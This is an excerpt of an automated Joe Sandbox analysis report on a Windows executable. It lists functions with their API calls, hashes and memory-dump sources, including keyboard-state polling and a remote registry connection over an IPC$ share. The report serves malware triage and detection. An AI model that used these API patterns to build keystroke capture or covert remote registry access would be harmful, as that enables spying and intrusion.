                                                                                                                                                                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                  • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                  • Opcode ID: 7c49d52ed8cd60c7019c886890567db89467936be8f64d08dadee12564bef966
                                                                                                                                                                                                                                  • Instruction ID: 535d6d02f9106c95f2ea46556887c5830136f2a7a652800dc8f3aa13cc186194
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c49d52ed8cd60c7019c886890567db89467936be8f64d08dadee12564bef966
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9119171A5026D79DB20A6A9EC5AEFF6A7CFFD5B40F0008297901E20D1EAB05949C6F0
                                                                                                                                                                                                                                  Function 009FA958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 009FA9D9
                                                                                                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 009FAA44
                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 009FAA64
                                                                                                                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 009FAA7B
                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 009FAAAA
                                                                                                                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 009FAABB
                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 009FAAE7
                                                                                                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 009FAAF5
                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 009FAB1E
                                                                                                                                                                                                                                  • GetKeyState.USER32(00000012), ref: 009FAB2C
                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 009FAB55
                                                                                                                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 009FAB63
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                                                                                                                  • Opcode ID: 5a4bb0c14c2f030ecee5d92a7a36c465b78358cdcf71f082cce988744d18f7e3
                                                                                                                                                                                                                                  • Instruction ID: ab3f9ebd6ea30ce2bc9402ac1dba5265d42ee66121f2bc414c8f5e1263e8cfe0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a4bb0c14c2f030ecee5d92a7a36c465b78358cdcf71f082cce988744d18f7e3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D651F9A0A0478C29FB35DBB48850BFABFB99F11340F084599D6C61B1C2DA94DB8CC763
                                                                                                                                                                                                                                  Function 009F662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 009F6649
                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 009F6662
                                                                                                                                                                                                                                  • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 009F66C0
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 009F66D0
                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 009F66E2
                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 009F6736
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 009F6744
                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 009F6756
                                                                                                                                                                                                                                  • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 009F6798
                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 009F67AB
                                                                                                                                                                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 009F67C1
                                                                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 009F67CE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3096461208-0
                                                                                                                                                                                                                                  • Opcode ID: 275701695e50548dd0cbe6ec29e962aa34cd2bae28a27b88bb7c69a65524caa3
                                                                                                                                                                                                                                  • Instruction ID: 605f5849c57369d4cb7eb553e49723185c905dd7f49fcb77f6a736583e2efe99
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 275701695e50548dd0cbe6ec29e962aa34cd2bae28a27b88bb7c69a65524caa3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C512F71A00309AFDB18DFA8CD89ABEBBB9FB48315F108139F515E6291D7749D058B50
                                                                                                                                                                                                                                  Function 0099146D Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00991802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00991488,?,00000000,?,?,?,?,0099145A,00000000,?), ref: 00991865
                                                                                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00991521
                                                                                                                                                                                                                                  • KillTimer.USER32(00000000,?,?,?,?,0099145A,00000000,?), ref: 009915BB
                                                                                                                                                                                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 009D29B4
                                                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0099145A,00000000,?), ref: 009D29E2
                                                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0099145A,00000000,?), ref: 009D29F9
                                                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0099145A,00000000), ref: 009D2A15
                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 009D2A27
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 641708696-0
                                                                                                                                                                                                                                  • Opcode ID: 6d10e1f70eca278dcd8f8b7c7bbe0732dbbe99d61761053d914a98fcdf848d53
                                                                                                                                                                                                                                  • Instruction ID: 77f368469ccb33937152ca547e567ecdbfbf209634d7d99929c63d765a873490
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d10e1f70eca278dcd8f8b7c7bbe0732dbbe99d61761053d914a98fcdf848d53
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F617B31501B12DFDF35DF98D948B2977B5FB94322F118529E0439A6B0C7B4A892DF81
                                                                                                                                                                                                                                  Function 00992128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00992234: GetWindowLongW.USER32(?,000000EB), ref: 00992242
                                                                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00992152
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ColorLongWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 259745315-0
                                                                                                                                                                                                                                  • Opcode ID: dfc8e08ab617450c91a084f4a7563b48cabca95beb323019e66d4805f3da54fa
                                                                                                                                                                                                                                  • Instruction ID: d1cf9e6b74a9a1b2de2651b687463eb7824152e38728253c66441303a70aaf19
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dfc8e08ab617450c91a084f4a7563b48cabca95beb323019e66d4805f3da54fa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F41B031144644BFDF349F6C9C48BB93B69AB42321F188615FAA28B2E6C7319D53DB11
                                                                                                                                                                                                                                  Function 009FA05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,009E0D31,00000001,0000138C,00000001,00000001,00000001,?,00A0EEAE,00A62430), ref: 009FA091
                                                                                                                                                                                                                                  • LoadStringW.USER32(00000000,?,009E0D31,00000001), ref: 009FA09A
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,009E0D31,00000001,0000138C,00000001,00000001,00000001,?,00A0EEAE,00A62430,?), ref: 009FA0BC
                                                                                                                                                                                                                                  • LoadStringW.USER32(00000000,?,009E0D31,00000001), ref: 009FA0BF
                                                                                                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009FA1E0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                  • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                  • Opcode ID: b18c32197ff41178f6f25ab63900d364cd54351a9988911310a56959891d1e54
                                                                                                                                                                                                                                  • Instruction ID: f75767799d7d1d66b7c51c1a29deb5dd6033769509a3653dedde69e8ee60be17
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b18c32197ff41178f6f25ab63900d364cd54351a9988911310a56959891d1e54
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0241407290410DAACF05EBE4DD46EEEB77CAF98341F100465F605B2092EB756F49CBA1
                                                                                                                                                                                                                                  Function 009F0FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00998577: _wcslen.LIBCMT ref: 0099858A
                                                                                                                                                                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009F1093
                                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009F10AF
                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009F10CB
                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 009F10F5
                                                                                                                                                                                                                                  • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 009F111D
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009F1128
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009F112D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                  • API String ID: 323675364-22481851
                                                                                                                                                                                                                                  • Opcode ID: dfae6bf49e9b7c69b7b6d4bf1f94ac2458c27c7dec285a750c28074d66f7360d
                                                                                                                                                                                                                                  • Instruction ID: 20e043fa786131068be62100cf5d21c20ef14b45c67e1627e99fba62db6b7b73
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dfae6bf49e9b7c69b7b6d4bf1f94ac2458c27c7dec285a750c28074d66f7360d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A41D972C1012DEBCF21EBA8EC85EEEB778BF54750F444169E905A3161EB359E09CB90
                                                                                                                                                                                                                                  Function 00A24A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00A24AD9
                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00A24AE0
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00A24AF3
                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00A24AFB
                                                                                                                                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00A24B06
                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00A24B10
                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00A24B1A
                                                                                                                                                                                                                                  • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00A24B30
                                                                                                                                                                                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00A24B3C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                  • String ID: static
                                                                                                                                                                                                                                  • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                  • Opcode ID: 15be8292153b1c27c8293b4edd41c476c307b23fae09b1f40a6f6a121982b9e5
                                                                                                                                                                                                                                  • Instruction ID: 15897493c0da89459a13341d59611eb2a58fd99ac0af765865fc306f72c68c6d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15be8292153b1c27c8293b4edd41c476c307b23fae09b1f40a6f6a121982b9e5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C317031100225BBDF21DFA8DC08FEA3BA9FF0D364F110221FA15A61A1C775D862DB94
                                                                                                                                                                                                                                  Function 00A1468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00A146B9
                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00A146E7
                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 00A146F1
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A1478A
                                                                                                                                                                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00A1480E
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00A14932
                                                                                                                                                                                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00A1496B
                                                                                                                                                                                                                                  • CoGetObject.OLE32(?,00000000,00A30B64,?), ref: 00A1498A
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00A1499D
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A14A21
                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00A14A35
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 429561992-0
                                                                                                                                                                                                                                  • Opcode ID: 43d45262596c13b7cd218662e272f0f451a6f0b7624d2cd57bc3851c7d6417f5
                                                                                                                                                                                                                                  • Instruction ID: ebcb92f7263901fae4411f50128be3396050974e4ca24d99f3ad5b739c632715
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43d45262596c13b7cd218662e272f0f451a6f0b7624d2cd57bc3851c7d6417f5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0C146B1604305AFD700DF68C8849ABBBE9FF89748F10492DF9899B251DB31ED46CB52
                                                                                                                                                                                                                                  Function 00A084DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00A08538
                                                                                                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A085D4
                                                                                                                                                                                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00A085E8
                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(00A30CD4,00000000,00000001,00A57E8C,?), ref: 00A08634
                                                                                                                                                                                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A086B9
                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(?,?), ref: 00A08711
                                                                                                                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00A0879C
                                                                                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A087BF
                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00A087C6
                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00A0881B
                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 00A08821
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2762341140-0
                                                                                                                                                                                                                                  • Opcode ID: 66b99a74f948116fe55c98bf659d35efb02bfc764b4fdb21490c53fc08569728
                                                                                                                                                                                                                                  • Instruction ID: cc1707e1c4375d5c8c4d0a45cbe097163dd292bc487004d9c2312f80be252729
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66b99a74f948116fe55c98bf659d35efb02bfc764b4fdb21490c53fc08569728
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92C12D75A00109AFDB14DFA8D884DAEBBF5FF48304B1484A8F559EB261DB34ED46CB50
                                                                                                                                                                                                                                  Function 009F0378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 009F039F
                                                                                                                                                                                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 009F03F8
                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 009F040A
                                                                                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 009F042A
                                                                                                                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 009F047D
                                                                                                                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 009F0491
                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 009F04A6
                                                                                                                                                                                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 009F04B3
                                                                                                                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009F04BC
                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 009F04CE
                                                                                                                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009F04D9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
